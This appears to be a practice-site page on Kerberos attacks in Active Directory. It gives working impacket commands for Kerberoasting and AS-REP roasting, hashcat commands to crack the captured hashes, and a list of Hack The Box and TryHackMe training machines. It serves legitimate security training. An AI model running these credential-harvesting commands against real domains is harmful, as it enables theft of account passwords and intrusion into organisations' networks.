Kerberos Attacks: practice machines and key commands
Kerberos is the default authentication protocol in Active Directory, and several of its design details are abusable. Kerberoasting requests service tickets for accounts with a servicePrincipalName and cracks the encrypted part offline, which works for any domain user. AS-REP roasting targets accounts that do not require pre-authentication and needs no credentials at all if you can guess usernames. Forged tickets, such as silver tickets built from a service account hash, give access to one service without touching the domain controller. Clock skew breaks everything, so sync time with the DC before you start. After capturing a hash, pick the right hashcat mode (13100 for TGS, 18200 for AS-REP) and check whether the recovered password is reused elsewhere. The boxes listed here exercise these attacks from both the Linux and Windows side.
Key commands
Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
Impacket GetUserSPNs (Kerberoasting)
Request Kerberos TGS tickets for accounts with SPNs and output format for Hashcat / John.
impacket-GetUserSPNs {DOMAIN}/{USER}:{PASSWORD} -dc-ip {TARGET_IP} -request -outputfile hashes.kerberoastImpacket GetNPUsers (AS-REP Roasting)
Query users with DONT_REQ_PREAUTH set to retrieve crackable Kerberos AS-REP hashes without creds.
impacket-GetNPUsers {DOMAIN}/ -usersfile users.txt -dc-ip {TARGET_IP} -format hashcat -outputfile asreproast.hashesHashcat Kerberos 5 TGS (Mode 13100)
Crack Kerberoasted Service Principal Name tickets to reveal service account passwords.
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt -OHashcat Kerberos 5 AS-REP (Mode 18200)
Crack AS-REP hashes captured for accounts with Kerberos preauthentication disabled.
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt -O
Keep going
- Methodology: Phase 06: Internal System & Network Reconnaissance
- Cheatsheet: Windows & Active Directory
Kerberos Attacks machines (16)
Machines are matched by their technique tags. 16 Windows.
Easy (2)
| Machine | Platform | OS |
|---|---|---|
| Forest | HTB | Windows |
| Sauna | HTB | Windows |
Medium (8)
| Machine | Platform | OS |
|---|---|---|
| Administrator | HTB | Windows |
| Attacking Kerberos | THM | Windows |
| Attacktive Directory | THM | Windows |
| Eden | THM | Windows |
| Exploiting Active Directory | THM | Windows |
| Scrambled | HTB | Windows |
| VulnNet: Roasted | THM | Windows |
| Za | THM | Windows |
Hard (5)
| Machine | Platform | OS |
|---|---|---|
| Blackfield | HTB | Windows |
| Enterprise | THM | Windows |
| Holo | THM | Windows |
| Mantis | HTB | Windows |
| Raz0rBlack | THM | Windows |
Insane (1)
| Machine | Platform | OS |
|---|---|---|
| Sizzle | HTB | Windows |
Related techniques
Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox